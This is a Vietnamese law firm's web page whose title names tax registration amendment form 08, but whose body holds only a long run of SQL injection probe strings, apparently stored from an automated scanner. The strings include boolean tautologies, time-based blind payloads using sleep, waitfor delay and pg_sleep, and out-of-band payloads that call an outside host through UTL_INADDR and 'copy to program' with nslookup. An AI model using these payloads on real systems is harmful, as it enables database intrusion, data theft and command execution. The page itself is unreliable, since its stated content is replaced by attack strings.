Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Tờ khai điều chỉnh thông tin đăng ký thuế mẫu 08

Cập nhật lần cuối lúc 15:20 ngày 22/04/2014

1
1
1
1
1'"
\
-1 OR 2+48-48-1=0+0+0+1 --
1
-1 OR 3+48-48-1=0+0+0+1 --
@@4l8VA
-1 OR 3*2<(0+5+48-48) --
JyI=
-1 OR 3*2>(0+5+48-48) --
-1 OR 2+328-328-1=0+0+0+1
-1 OR 3+328-328-1=0+0+0+1
-1 OR 3*2<(0+5+328-328)
-1 OR 3*2>(0+5+328-328)
-1' OR 2+14-14-1=0+0+0+1 --
-1' OR 3+14-14-1=0+0+0+1 --
-1' OR 3*2<(0+5+14-14) --
-1' OR 3*2>(0+5+14-14) --
-1' OR 2+687-687-1=0+0+0+1 or 'pmIYrO0A'='
-1' OR 3+687-687-1=0+0+0+1 or 'pmIYrO0A'='
-1' OR 3*2<(0+5+687-687) or 'pmIYrO0A'='
-1' OR 3*2>(0+5+687-687) or 'pmIYrO0A'='
-1" OR 2+769-769-1=0+0+0+1 --
-1" OR 3+769-769-1=0+0+0+1 --
-1" OR 3*2<(0+5+769-769) --
-1" OR 3*2>(0+5+769-769) --
if(now()=sysdate(),sleep(14.810999999999998),0)/*'XOR(if(now()=sysdate(),sleep(14.810999999999998),0))OR'"XOR(if(now()=sysdate(),sleep(14.810999999999998),0))OR"*/
(select(0)from(select(sleep(14.810999999999998)))v)/*'+(select(0)from(select(sleep(14.810999999999998)))v)+'"+(select(0)from(select(sleep(14.810999999999998)))v)+"*/
-1; waitfor delay '0:0:14.810999999999998' --
-1); waitfor delay '0:0:14.810999999999998' --
1 waitfor delay '0:0:4.936999999999999' --
RapVaxFX'; waitfor delay '0:0:4.936999999999999' --
lto3MWkm'; waitfor delay '0:0:14.810999999999998' --
-1;select pg_sleep(14.810999999999998); --
-1);select pg_sleep(4.936999999999999); --
-1));select pg_sleep(4.936999999999999); --
g6WB25Vq';select pg_sleep(4.936999999999999); --
i37jSuo2');select pg_sleep(9.873999999999998); --
ZMHBVhrV'));select pg_sleep(9.873999999999998); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5315.34060.ece13.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5317.34060.ece13.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-5319.34060.ece13.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-5320.34060.ece13.\1.bxss.me
681'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: